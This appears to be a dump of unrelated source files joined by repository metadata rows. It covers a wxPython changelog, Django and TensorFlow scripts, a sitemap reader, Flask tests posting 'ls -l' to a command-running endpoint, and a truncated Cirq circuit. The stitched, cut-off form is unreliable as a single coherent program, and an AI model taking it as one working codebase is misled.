## 27. Added a ton more doc strings to explain use and derivation requirements
## and did regularization of the naming conventions.
## 28. Fixed a range bug in _adjustKey preventing z from being handled properly.
## 29. Changed behavior of '.' (and shift-.) in numeric controls to move to
## reformat the value and move the next field as appropriate. (shift-'.',
## ie. '>' moves to the previous field.
## Version 0.0.6
## 1. Fixed regex bug that caused autoformat AGE to invalidate any age ending
## in '0'.
## 2. New format character 'D' to trigger date type. If the user enters 2 digits in the
## year position, the control will expand the value to four digits, using numerals below
## 50 as 21st century (20+nn) and less than 50 as 20th century (19+nn).
## Also, new optional parameter datestyle = set to one of {MDY|DMY|YDM}
## 3. revalid parameter renamed validRegex to conform to standard for all validation
## parameters (see 2 new ones below).
## 4. New optional init parameter = validRange. Used only for int/dec (numeric) types.
## Allows the developer to specify a valid low/high range of values.
## 5. New optional init parameter = validList. Used for character types. Allows developer
## to send a list of values to the control to be used for specific validation.
## See the Last Name Only example - it is list restricted to Smith/Jones/Williams.
## 6. Date type fields now use wxDateTime's parser to validate the date and time.
## This works MUCH better than my kludgy regex!! Thanks to Robin Dunn for pointing
## me toward this solution!
## 7. Date fields now automatically expand 2-digit years when it can. For example,
## if the user types "03/10/67", then "67" will auto-expand to "1967". If a two-year
## date is entered it will be expanded in any case when the user tabs out of the
## field.
## 8. New class functions: SetValidBackgroundColor, SetInvalidBackgroundColor, SetEmptyBackgroundColor,
##      SetSignedForeColor allow access to override default class coloring behavior.
## 9. Documentation updated and improved.
## 10. Demo - page 2 is now a wxFrame class instead of a wxPyApp class. Works better.
## Two new options (checkboxes) - test highlight empty and disallow empty.
## 11. Home and End now work more intuitively, moving to the first and last user-entry
## value, respectively.
## 12. New class function: SetRequired(bool). Sets the control's entry required flag
## (i.e. disallow empty values if True).
##
## Version 0.0.5
## 1. get_plainValue method renamed to GetPlainValue following the wxWindows
## StudlyCaps(tm) standard (thanks Paul Moore). ;)
## 2. New format code 'F' causes the control to auto-fit (auto-size) itself
## based on the length of the mask template.
## 3. Class now supports "autoformat" codes. These can be passed to the class
## on instantiation using the parameter autoformat="code". If the code is in
## the dictionary, it will self set the mask, formatting, and validation string.
## I have included a number of samples, but I am hoping that someone out there
## can help me to define a whole bunch more.
## 4. I have added a second page to the demo (as well as a second demo class, test2)
## to showcase how autoformats work. The way they self-format and self-size is,
## I must say, pretty cool.
## 5. Comments added and some internal cosmetic revisions re: matching the code
## standards for class submission.
## 6. Regex validation is now done in real time - field turns yellow immediately
## and stays yellow until the entered value is valid
## 7. Cursor now skips over template characters in a more intuitive way (before the
## next keypress).
## 8. Change, Keypress and LostFocus methods added for convenience of subclasses.
## Developer may use these methods which will be called after EVT_TEXT, EVT_CHAR,
## and EVT_KILL_FOCUS, respectively.
## 9. Decimal and numeric handlers have been rewritten and now work more intuitively.
##
## Version 0.0.4
## 1. New .IsEmpty() method returns True if the control's value is equal to the
## blank template string
## 2. Control now supports a new init parameter: revalid. Pass a regular expression
## that the value will have to match when the control loses focus. If invalid,
## the control's BackgroundColor will turn yellow, and an internal flag is set (see next).
## 3. Demo now shows revalid functionality. Try entering a partial value, such as a
## partial social security number.
## 4. New .IsValid() value returns True if the control is empty, or if the value matches
## the revalid expression. If not, .IsValid() returns False.
## 5. Decimal values now collapse to decimal with '.00' on losefocus if the user never
## presses the decimal point.
## 6. Cursor now goes to the beginning of the field if the user clicks in an
##      "empty" field instead of leaving the insertion point in the middle of the
## field.
## 7. New "N" mask type includes upper and lower chars plus digits. a-zA-Z0-9.
## 8. New formatcodes init parameter replaces other init params and adds functions.
## String passed to control on init controls:
## _ Allow spaces
## ! Force upper
## ^ Force lower
## R Show negative #s in red
## , Group digits
## - Signed numerals
## 0 Numeric fields get leading zeros
## 9. Ctrl-X in any field clears the current value.
## 10. Code refactored and made more modular (esp in OnChar method). Should be more
## easy to read and understand.
## 11. Demo enhanced.
##  12. Now has __doc__.
##
## Version 0.0.3
## 1. GetPlainValue() now returns the value without the template characters;
## so, for example, a social security number (123-33-1212) would return as
## 123331212; also removes white spaces from numeric/decimal values, so
## "- 955.32" is returned "-955.32". Press ctrl-S to see the plain value.
## 2. Press '.' in an integer style masked control and truncate any trailing digits.
## 3. Code moderately refactored. Internal names improved for clarity. Additional
## internal documentation.
## 4. Home and End keys now supported to move cursor to beginning or end of field.
## 5. Un-signed integers and decimals now supported.
## 6. Cosmetic improvements to the demo.
## 7. Class renamed to MaskedTextCtrl.
## 8. Can now specify include characters that will override the basic
## controls: for example, includeChars = "@." for email addresses
## 9. Added mask character 'C' -> allow any upper or lowercase character
## 10. .SetSignColor(str:color) sets the foreground color for negative values
## in signed controls (defaults to red)
## 11. Overview documentation written.
##
## Version 0.0.2
## 1. Tab now works properly when pressed in last position
## 2. Decimal types now work (e.g. #####.##)
## 3. Signed decimal or numeric values supported (i.e. negative numbers)
## 4. Negative decimal or numeric values now can show in red.
## 5. Can now specify an "exclude list" with the excludeChars parameter.
## See date/time formatted example - you can only enter A or P in the
## character mask space (i.e. AM/PM).
## 6. Backspace now works properly, including clearing data from a selected
## region but leaving template characters intact. Also delete key.
## 7. Left/right arrows now work properly.
## 8. Removed EventManager call from test so demo should work with wxPython 2.3.3
##
| [
"RD@c3d73ce0-8a6f-49c7-b76d-6d57e0e08775"
] | RD@c3d73ce0-8a6f-49c7-b76d-6d57e0e08775 |
2d2113c43a965b1556bcdf535ced30eea8d3734f | 46b5c1bc98678f02cbd39b6c814e6b32908a6c22 | /venv/bin/csvlook | c02dbd9fedc446b3516fcaab1177f4e2063e9e8e | [] | no_license | Peter-32/portofvirginiaapp | ea0aceedce6efe928f4c128fb4935f000048678f | e0cfdd379d9654d41b301a52bcd6d77aa08d4591 | refs/heads/master | 2022-11-07T15:13:51.111003 | 2019-07-24T05:15:57 | 2019-07-24T05:15:57 | 198,562,849 | 0 | 1 | null | 2022-10-08T03:46:30 | 2019-07-24T05:13:23 | Python | UTF-8 | Python | false | false | 304 | #!/Users/petermyers/Desktop/Code/test_pyinstaller2/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from csvkit.utilities.csvlook import launch_new_instance
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(launch_new_instance())
| [
"peter@impactradius.com"
] | peter@impactradius.com | |
1bd639ff67bbc8cd8cc937c885b0d31a4cacaf7d | c5cdb85c122c32165a0a00428ab85c03bc5d8fa6 | /Week3/day2/tv_shows/application/migrations/0001_initial.py | 723c8528775c0927ca23fb7c84e04b09bf37b34a | [] | no_license | sadieBoBadie/Dec2020Python | 70f841aff0b816a0cbf5519418d0c6ce14b90729 | 595aeea4092c8962c8a7e08fa757a0b8ddc8c897 | refs/heads/main | 2023-02-01T15:28:25.885585 | 2020-12-19T02:46:48 | 2020-12-19T02:46:48 | 317,356,502 | 0 | 9 | null | null | null | null | UTF-8 | Python | false | false | 795 | py | # Generated by Django 2.2 on 2020-12-15 22:19
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated initial migration (Django 2.2): creates the "Show" table
    # with title/description/network/release_date fields plus the standard
    # created_at/updated_at audit timestamps.  Generated migrations should not
    # be hand-edited once applied to any database.

    # First migration for this app: no prior migration state required.
    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Show',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=255)),
                ('description', models.TextField()),
                ('network', models.CharField(max_length=255)),
                ('release_date', models.DateField()),
                # auto_now_add: set once on INSERT; auto_now: refreshed on every save()
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('updated_at', models.DateTimeField(auto_now=True)),
            ],
        ),
    ]
| [
"sflick@codingdojo.com"
] | sflick@codingdojo.com |
a0ff0eb4f6ab02c8d96e79c6f9123bfb69ca2e08 | fa0e61d9cf6ace4c3198724afa9ddbc15ac8cd1f | /qurry/constructs/define.py | 24b6ee3b84556563203e76a8f48fcec008ed292f | [
"MIT"
] | permissive | nguyenducnhaty/Qurry | aa338877b8f72394a0165bdc2ab8838ff6386e34 | 9766cc8ea19d438d3408080bf584faab12537789 | refs/heads/master | 2020-05-28T08:05:39.762862 | 2019-04-03T18:45:41 | 2019-04-03T18:45:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 712 | py | from ..definitions import update_definitions
from ..datatype import Datatype
from pprint import pprint
def process_type(body, kernel):
    """Instantiate a registered datatype from a type expression.

    *body* is a (possibly singly-nested) sequence whose head names a
    Datatype registered in ``kernel.definitions``; the remaining elements
    are forwarded to that datatype's ``__init__``.

    Raises ValueError when the head is unknown or not a Datatype.
    """
    if len(body) == 1:
        # unwrap a single-element nesting level: ((head, ...),) -> (head, ...)
        body = body[0]
    head, *args = body
    known = head in kernel.definitions and isinstance(kernel.definitions[head], Datatype)
    if not known:
        raise ValueError('Cannot process type {}'.format(head))
    return kernel.definitions[head].__init__(*args)
def define(*expression, kernel=None):
    """Bind a new name in *kernel* to the datatype the expression tail describes.

    ``expression`` is (name, *type_expression).  Raises ValueError if *name*
    is already defined; returns '' on success.
    """
    name, *type_expr = expression
    if name in kernel.definitions:
        raise ValueError('{} is already defined'.format(name))
    kernel.definitions[name] = process_type(type_expr, kernel)
    print(kernel.definitions)  # NOTE(review): debug trace left in — confirm intended
    return ''
| [
"lucassaldyt@gmail.com"
] | lucassaldyt@gmail.com |
71e45223c641fee198b9a3403e9340051a5e26a4 | d15eb98c00537b6303b3b9f396eac6df5af10f20 | /transformer_RC/eval.py | 26b907dcdd6ec297c83a09f7a4a46671b8ae6b75 | [] | no_license | fooSynaptic/transfromer_NN_Block | ab17d2ac5ecc04d3fd54407d72b8dc44c5671168 | 62c7769e6dc66de8185f29ecb5a7de4f3ceb3374 | refs/heads/master | 2023-04-04T01:28:13.066026 | 2019-11-22T02:11:25 | 2019-11-22T02:11:25 | 150,613,743 | 9 | 0 | null | 2023-03-24T22:46:39 | 2018-09-27T16:05:59 | Python | UTF-8 | Python | false | false | 5,632 | py | # -*- coding: utf-8 -*-
#/usr/bin/python3
import codecs
import os
import tensorflow as tf
import numpy as np
from hyperparams import rc_Hyperparams as hp
from data_load import load_vocabs, load_train_data, load_test_data, create_data
from train import Graph
#from nltk.translate.bleu_score import corpus_bleu
import argparse
#from sklearn.metrics import classification_report
#from utils import compute_bleu_rouge
import pandas as pd
from modules import bleu
def find_best_answer_for_passage(start_probs, end_probs, passage_len=None):
    """Select the answer span maximizing start_prob * end_prob in one passage.

    Only spans of at most ``hp.ans_maxlen`` tokens are considered.  Returns
    ``((start, end), prob)``; ``((-1, -1), 0)`` when no span has positive
    probability.
    """
    limit = len(start_probs) if passage_len is None else min(len(start_probs), passage_len)
    best_span, best_prob = (-1, -1), 0
    for start_idx in range(limit):
        # candidate ends: at most hp.ans_maxlen tokens, clipped to the passage
        last = min(start_idx + hp.ans_maxlen, limit)
        for end_idx in range(start_idx, last):
            prob = start_probs[start_idx] * end_probs[end_idx]
            if prob > best_prob:
                best_span, best_prob = (start_idx, end_idx), prob
    return best_span, best_prob
def eval(task_name):
    """Run span-prediction inference over the test set and report BLEU-1..4.

    Restores the latest checkpoint from ``hp.logdir``, predicts an answer span
    for every full batch of test questions, and writes reference/prediction
    pairs plus averaged BLEU scores to ``results/<model-name>``.

    NOTE: the name shadows the builtin ``eval``; kept for caller compatibility.
    *task_name* is accepted but currently unused by the inference path.
    """
    # Load graph
    g = Graph(is_training=False)
    print("Graph loaded")

    # Load data
    test_data = pd.read_csv(hp.testfile)
    questions, contents, q_lens, p_lens, start_pos, end_pos = load_test_data()
    raw_passages = list(test_data['content'])
    reference_answers = list(test_data['answer'])
    word2idx, idx2word = load_vocabs()

    # Start session
    with g.graph.as_default():
        sv = tf.train.Supervisor()
        with sv.managed_session(config=tf.ConfigProto(allow_soft_placement=True)) as sess:
            ## Restore parameters from the most recent checkpoint
            sv.saver.restore(sess, tf.train.latest_checkpoint(hp.logdir))
            print("Restored!")

            ## Get model name (first quoted token in the checkpoint index file)
            print('Model dir:', hp.logdir)
            mname = open(hp.logdir + '/checkpoint', 'r').read().split('"')[1] # model name
            print("Model name:", mname)

            ## Inference
            if not os.path.exists('results'): os.mkdir('results')
            with codecs.open("results/" + mname, "w", "utf-8") as fout:
                pred_dict, ref_dict = {}, {}
                ques_id = 0
                eval_dict = {'bleu_1':[], 'bleu_2':[], 'bleu_3':[], 'bleu_4':[]}
                # NOTE: a trailing partial batch (< hp.batch_size) is dropped.
                for i in range(len(questions) // hp.batch_size):
                    print("Iterator: {} / {}".format(i, len(questions)//hp.batch_size))
                    ### Get mini-batches
                    q = questions[i*hp.batch_size: (i+1)*hp.batch_size]
                    p = contents[i*hp.batch_size: (i+1)*hp.batch_size]
                    q_length = q_lens[i*hp.batch_size: (i+1)*hp.batch_size]
                    p_length = p_lens[i*hp.batch_size: (i+1)*hp.batch_size]
                    s_pos = start_pos[i*hp.batch_size: (i+1)*hp.batch_size]
                    e_pos = end_pos[i*hp.batch_size: (i+1)*hp.batch_size]
                    passages = raw_passages[i*hp.batch_size: (i+1)*hp.batch_size]
                    ref_answers = reference_answers[i*hp.batch_size: (i+1)*hp.batch_size]
                    feed_dict = {g.q: q,
                                 g.p: p,
                                 g.q_length: q_length,
                                 g.p_length: p_length,
                                 g.start_label: s_pos,
                                 g.end_label: e_pos}
                    start_probs, end_probs = sess.run([g.start_probs, g.end_probs], feed_dict)

                    ### Write predictions and per-example BLEU to file
                    for start_prob, end_prob, passage, ref in zip(start_probs, end_probs, passages, ref_answers):
                        pred_span, prob = find_best_answer_for_passage(start_prob, end_prob)
                        pred_answer = passage[pred_span[0]: pred_span[1]+1]
                        # span search failed (no positive-probability span): skip
                        if not len(pred_answer) > 0: continue
                        pred_dict[str(ques_id)] = [pred_answer]
                        ref_dict[str(ques_id)] = [ref]
                        ques_id += 1
                        fout.write('-ref: '+ ref)
                        fout.write("-pred: "+ pred_answer)
                        # character-level BLEU-1..4 between prediction and reference
                        b1, b2, b3, b4 = bleu(list(pred_answer), list(ref), 1), \
                                         bleu(list(pred_answer), list(ref), 2), \
                                         bleu(list(pred_answer), list(ref), 3), \
                                         bleu(list(pred_answer), list(ref), 4)
                        eval_dict['bleu_1'].append(b1)
                        eval_dict['bleu_2'].append(b2)
                        eval_dict['bleu_3'].append(b3)
                        # BUG FIX: previously appended b2 to 'bleu_2' a second
                        # time, leaving 'bleu_4' empty (np.mean([]) -> nan).
                        eval_dict['bleu_4'].append(b4)

                for metric in eval_dict:
                    fout.write(metric + '\t' + str(np.mean(eval_dict[metric])) + '\n')
                    print(metric + '\t' + str(np.mean(eval_dict[metric])))
if __name__ == '__main__':
    # Command-line entry point: pick the evaluation task and run inference.
    arg_parser = argparse.ArgumentParser(description='Choice the task you want to eval.')
    arg_parser.add_argument('--task', help='task name(default: RC)')
    cli_args = arg_parser.parse_args()
    eval(cli_args.task)
    print("Done")
| [
"hujiaxin@ajmide.com"
] | hujiaxin@ajmide.com |
33bf6b98e2e6b8bbde66d8196ef5407b2978efbb | 2073b98ec0f42c0cca08480cad534aa11fee6101 | /solution/src/SecondGo.py | 2402d26443d1b3a2382ed8295292545cf564cb1e | [] | no_license | chrisjdavie/ReverseShuffleMerge | 47c81fcdab26177676b0a82402bb61a2440c8027 | 184f09f7f83a11d4904874d91853dc4467f4f219 | refs/heads/master | 2021-01-10T13:43:48.666040 | 2016-01-02T15:13:22 | 2016-01-02T15:13:22 | 48,913,511 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,286 | py | '''
First go ran over the time limit, which isn't surprising as I brute
forced with permutations. Looking at this, there is a more elegant
solution, but it's not clear immediately how. But it's there.
Okay, this approach worked, but it's not the clearest what's going on.
Esentially, there are the merged counts and the reverse counts,
and I first deplete the merged counts and then the reverse counts,
always looking for the next best (and removing that from the reverse
counts when found.)
A better solution (in terms of code simplicity, probably takes much
longer in alg terms), that I can't be bothered to implement right now,
is finding the best characters, and then filling those up, adding in
any that go over the limit. There's also a trick, keeping track of the
previous minimum value, and if you hit a crappy one, substitute that
in, then reversing to that point (repopulating the arrays appropriately)
and starting again.
I'm not 100% I've got the reversing right in my alg, I think there
might be some cases it doesn't work, but I'm not sure, I might be
okay.
Created on 1 Jan 2016
@author: chris
'''
import copy
from collections import Counter
def smallercharBest(testString, highChar, charCountsRemain):
    """Find the lexicographically smallest usable character in *testString*.

    A character is usable when it still has remaining budget in
    *charCountsRemain* and sorts strictly below *highChar*.

    Returns ``(char, index_of_first_occurrence)``, or ``('zz', -1)`` when no
    character qualifies ('zz' is the caller's "no match" sentinel).

    Improvement over the original: the index is tracked during the single
    scan instead of re-finding it afterwards with ``testString.index()``.
    """
    minChar, minIndex = 'zz', -1
    for index, testChar in enumerate(testString):
        # strict '<' keeps the FIRST occurrence of the eventual minimum,
        # matching the old behavior of testString.index(minChar)
        if testChar < minChar and charCountsRemain[testChar] > 0 \
                and testChar < highChar:
            minChar, minIndex = testChar, index
    return minChar, minIndex
def updateBestChar(charBest, reversedCharsCounter, bestUnique):
    """Advance to the next target character once *charBest* is exhausted.

    Returns *charBest* unchanged while copies remain in
    *reversedCharsCounter*; otherwise pops the next candidate off
    *bestUnique*, or the 'zz' sentinel when none are left.
    """
    if reversedCharsCounter[charBest] != 0:
        return charBest
    return bestUnique.pop(0) if bestUnique else 'zz'
# --- Main (Python 2): reconstruct the lexicographically smallest string s
# --- such that merging reverse(s) with a shuffle of s yields the input.
mixedString = raw_input().strip()
# find characters in original string
elements = Counter(mixedString)
reversedCharsCounter = Counter()
for char in elements:
    # exactly half of each character's occurrences belongs to reverse(s)
    # (Python 2 integer division)
    reversedCharsCounter[char] = elements[char]/2
uniqueChars = set(reversedCharsCounter.elements())
# try with the most lexicographically ordered test
bestUnique = sorted(list(uniqueChars))
op = []  # characters of the answer, emitted left to right
mergedCharsCounter = copy.deepcopy(reversedCharsCounter)  # budget of skippable chars
remainString = list(mixedString[::-1])  # scan the input reversed
charBest = bestUnique.pop(0)  # smallest character still required
indsPop = []  # NOTE(review): never used — presumably leftover from an earlier draft
prevCharInd = 0  # index of the last character taken into op
for i, charRemain in enumerate(remainString):
    if charRemain == charBest:
        # found the best character, add to output
        op.append(charRemain)
        reversedCharsCounter[charRemain] -= 1
        prevCharInd = i
    elif mergedCharsCounter[charRemain] > 0:
        # skips this character, assigns it to the merged characters
        mergedCharsCounter[charRemain] -= 1
    elif reversedCharsCounter[charRemain] > 0:
        # if there are characters of charRemain to be found in the
        # reversed character, seek lexiographically smaller characters
        # between this and the previous character.
        #
        # then append this character to the output.
        resetInd = i
        if ord(charRemain) - ord(charBest) > 1:
            smallerInd = 0
            while smallerInd > -1:
                # repeatedly pull the smallest eligible character out of the
                # window of characters previously skipped over
                smallChar, smallerInd = smallercharBest(remainString[prevCharInd+1:i],
                                                        charRemain,
                                                        reversedCharsCounter)
                if smallerInd > -1:
                    op.append(smallChar)
                    reversedCharsCounter[smallChar] -= 1
                    prevCharInd += 1 + smallerInd
                    mergedCharsCounter[smallChar] += 1
            try:
                # rewind the scan position to the first matching character
                # after the substitutions just made
                resetInd = prevCharInd + 1 + remainString[prevCharInd+1:i].index(charRemain)
            except(ValueError):
                pass
        op.append(charRemain)
        reversedCharsCounter[charRemain] -= 1
        prevCharInd = resetInd
    charBest = updateBestChar(charBest, reversedCharsCounter, bestUnique)
    if charBest == 'zz':
        # every required character has been emitted
        break
print "".join(op)
| [
"chris.d@theasi.co"
] | chris.d@theasi.co |
16db50922eb05c4853e1a5a7bf928ed0a8659684 | 3a4fbde06794da1ec4c778055dcc5586eec4b7d2 | /@lib/12-13-2011-01/vyperlogix/sitemap/reader.py | db72d9f10eac4984c687669739d3f543c9c1f55b | [] | no_license | raychorn/svn_python-django-projects | 27b3f367303d6254af55c645ea003276a5807798 | df0d90c72d482b8a1e1b87e484d7ad991248ecc8 | refs/heads/main | 2022-12-30T20:36:25.884400 | 2020-10-15T21:52:32 | 2020-10-15T21:52:32 | 304,455,211 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,192 | py | import re
import string
import sys
import httplib
import urllib2
from xml.dom import minidom
from vyperlogix.misc import _utils
__copyright__ = """\
(c). Copyright 2008-2014, Vyper Logix Corp., All Rights Reserved.
Published under Creative Commons License
(http://creativecommons.org/licenses/by-nc/3.0/)
restricted to non-commercial educational use only.,
http://www.VyperLogix.com for details
THE AUTHOR VYPER LOGIX CORP DISCLAIMS ALL WARRANTIES WITH REGARD TO
THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS, IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL,
INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING
FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,
NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION
WITH THE USE OR PERFORMANCE OF THIS SOFTWARE !
USE AT YOUR OWN RISK.
"""
class ModelSitemap:
    # Fetches a sitemap XML document over HTTP and extracts the <loc> URL of
    # every <url> entry.  NOTE: Python 2 code (urllib2, "except Exception, e").
    def __init__(self):
        # NOTE(review): self.data is never read by links() — presumably a
        # leftover; confirm before removing.
        self.data = []
    def links (self, address):
        # Return the list of <loc> URLs found in the sitemap at *address*.
        # On a parse failure the returned list instead contains a formatted
        # traceback string followed by the raw (ASCII-filtered) feed text.
        file_request = urllib2.Request(address)
        file_opener = urllib2.build_opener()
        file_feed = file_opener.open(file_request).read()
        items = []
        # strip non-ASCII bytes so minidom does not choke on the payload
        file_feed = _utils.ascii_only(file_feed)
        try:
            file_xml = minidom.parseString(file_feed)
            item_nodes = file_xml.getElementsByTagName("url")
            for item in item_nodes:
                nodes = []
                # only <loc> children carry the page URL
                for node in [n for n in item.childNodes if (n.nodeName == 'loc')]:
                    try:
                        nodes.append(node.firstChild.data)
                    except:
                        # tolerate empty <loc/> elements (no text child)
                        pass
                for n in nodes:
                    items.append(n)
        except Exception, e:
            # report the failure inside the result list rather than raising
            info_string = _utils.formattedException(details=e)
            items.append(info_string)
            items.append(str(file_feed))
        return items
def read_sitemap_links(url):
    """Convenience wrapper: fetch *url* and return its sitemap <loc> links."""
    return ModelSitemap().links(url)
if __name__ == "__main__":
    import sys
    # Emit the license/copyright banner to both stdout and stderr
    # (Python 2 "print >>stream" redirection syntax).
    print >>sys.stdout, __copyright__
    print >>sys.stderr, __copyright__
| [
"raychorn@gmail.com"
] | raychorn@gmail.com |
21406bbc518e376d68ec6a67b0ff2d8424741171 | 686d2e525b7cd7a792501309f251dbf6dcea7ef4 | /leetcode/dynamic programming/26.62 不同的路径.py | f04f16a4ae7089ade35d23be260e8a2168acc76d | [] | no_license | freemanwang/Algorithm | fa23c9c33c43f942e72d9d1828a95417e7c99575 | bb691c1afb460a382d7aaaa308e8b4e17f5bf4c5 | refs/heads/master | 2020-06-29T19:37:32.584724 | 2020-02-07T06:36:29 | 2020-02-07T06:36:29 | 200,605,658 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 772 | py | '''
一个机器人位于一个 m x n 网格的左上角 (起始点在下图中标记为“Start” )。
机器人每次只能向下或者向右移动一步。机器人试图达到网格的右下角(在下图中标记为“Finish”)。
问总共有多少条不同的路径?
说明:m 和 n 的值均不超过 100。
示例 1:
输入: m = 3, n = 2
输出: 3
解释:
从左上角开始,总共有 3 条路径可以到达右下角。
1. 向右 -> 向右 -> 向下
2. 向右 -> 向下 -> 向右
3. 向下 -> 向右 -> 向右
示例 2:
输入: m = 7, n = 3
输出: 28
'''
# 应用动态规划解决问题
#状态转移:走到(m,n) 只能由 (m-1,n) 向右走一格 或者 (m,n-1) 向下走一格
# 最优子结构:F(m, n) = F(m-1, n) + F(m, n-1)
# 边界: | [
"121689123@qq.com"
] | 121689123@qq.com |
b2b21d3ee8516a7cfb2bf97d2d121a455ef2fad3 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03479/s210485900.py | 104cb0c9d70362d67521ce65fec1cbf0a4e8d9bf | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 301 | py | import sys
readline = sys.stdin.readline
MOD = 10 ** 9 + 7
INF = float('INF')
sys.setrecursionlimit(10 ** 5)
def main():
x, y = list(map(int, readline().split()))
ans = 0
c = x
while c <= y:
ans += 1
c <<= 1
print(ans)
if __name__ == '__main__':
main()
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
d8d63477b2da98c431cad1a9d38bd02193e100f4 | 9bb958a3b5ae3a083a265b37bc1f83fc2c41bdfd | /tests/test_api.py | cfdaa9bc9819e93aa32461dc45c32babf4eee411 | [] | no_license | chfw/Minion | 434ccd6042f8730151b6fdf711b6f9e0cd7f077d | 88093463de0ad4b30f63f7bc933c8dbcd13888da | refs/heads/master | 2020-12-03T04:07:55.727275 | 2017-06-29T20:57:26 | 2017-06-29T20:57:26 | 95,818,616 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,366 | py | import sys
import json
from nose.tools import eq_
from minion.app import create_app
PY2 = sys.version_info[0] == 2
class TestViews:
def setUp(self):
self.app = create_app()
self.client = self.app.test_client()
def test_api_run_view(self):
data = {
'command': 'ls -l'
}
response = self._request_api_run_view(data)
if PY2:
response_json = json.loads(response.data)
else:
response_json = json.loads(
response.data.decode('utf-8'))
eq_(response.status_code, 200)
assert('setup.py' in response_json['result'])
def test_api_run_view_with_wrong_payload(self):
data = {
'commando': 'ls -l'
}
response = self._request_api_run_view(data)
if PY2:
response_json = json.loads(response.data)
else:
response_json = json.loads(
response.data.decode('utf-8'))
eq_(response.status_code, 400)
assert('In correct instructions, Master' in response_json['message'])
def _request_api_run_view(self, data):
headers = {
'Content-Type': 'application/json'
}
response = self.client.post(
'/api/run/',
data=json.dumps(data),
headers=headers)
return response
| [
"wangc_2011@hotmail.com"
] | wangc_2011@hotmail.com |
45d161818d304c8026b94370ed51ef93080f25dc | 1f3120356dbc5278dc5fb9e23017bb4b1ea1e466 | /docker/lib/python3.7/weakref.py | f7c3acae7c93193c9ad49cb283dfa73807cdfd77 | [] | no_license | AllenMkandla/intro_to_docker | 94669c3647348651b4ba31734dcb9ea6a74f9241 | 1aa812852bcd6b21613bc81e3bd44fa9e3193e14 | refs/heads/master | 2022-04-17T18:27:03.515706 | 2020-04-18T15:37:55 | 2020-04-18T15:37:55 | 256,784,637 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 46 | py | /home/allen/anaconda3/lib/python3.7/weakref.py | [
"allen.mkandla@umuzi.org"
] | allen.mkandla@umuzi.org |
0c5be048707b2514b3ed824531d847aee604bf4b | 09e57dd1374713f06b70d7b37a580130d9bbab0d | /benchmark/startCirq1993.py | 6838def910331cff05b9e13bcc3360a738377755 | [
"BSD-3-Clause"
] | permissive | UCLA-SEAL/QDiff | ad53650034897abb5941e74539e3aee8edb600ab | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | refs/heads/main | 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,775 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 5/15/20 4:49 PM
# @File : grover.py
# qubit number=4
# total number=32
import cirq
import cirq.google as cg
from typing import Optional
import sys
from math import log2
import numpy as np
#thatsNoCode
from cirq.contrib.svg import SVGCircuit
# Symbols for the rotation angles in the QAOA circuit.
def make_circuit(n: int, input_qubit):
    # Build the fixed, auto-generated benchmark circuit over *input_qubit*
    # (a sequence of 4 qubits).  *n* mirrors the generator's signature and is
    # not otherwise used.  Ends with a joint measurement keyed 'result'.
    # The "# number=NN" tags are the generator's per-gate identifiers.
    c = cirq.Circuit()  # circuit begin

    c.append(cirq.H.on(input_qubit[0])) # number=9
    c.append(cirq.H.on(input_qubit[1])) # number=2
    c.append(cirq.H.on(input_qubit[2])) # number=3
    c.append(cirq.H.on(input_qubit[3])) # number=4
    c.append(cirq.Y.on(input_qubit[3])) # number=12
    c.append(cirq.H.on(input_qubit[3])) # number=29
    c.append(cirq.CZ.on(input_qubit[2],input_qubit[3])) # number=30
    c.append(cirq.H.on(input_qubit[3])) # number=31
    c.append(cirq.H.on(input_qubit[0])) # number=5
    c.append(cirq.H.on(input_qubit[1])) # number=6
    c.append(cirq.H.on(input_qubit[2])) # number=24
    c.append(cirq.CZ.on(input_qubit[3],input_qubit[2])) # number=25
    c.append(cirq.H.on(input_qubit[2])) # number=26
    c.append(cirq.H.on(input_qubit[2])) # number=7
    c.append(cirq.H.on(input_qubit[3])) # number=8
    c.append(cirq.X.on(input_qubit[2])) # number=23
    c.append(cirq.H.on(input_qubit[3])) # number=16
    c.append(cirq.CZ.on(input_qubit[0],input_qubit[3])) # number=17
    c.append(cirq.H.on(input_qubit[3])) # number=18
    c.append(cirq.X.on(input_qubit[3])) # number=14
    c.append(cirq.CNOT.on(input_qubit[0],input_qubit[3])) # number=15
    c.append(cirq.Y.on(input_qubit[2])) # number=10
    c.append(cirq.Y.on(input_qubit[2])) # number=11
    c.append(cirq.X.on(input_qubit[1])) # number=20
    c.append(cirq.X.on(input_qubit[1])) # number=21
    c.append(cirq.X.on(input_qubit[3])) # number=27
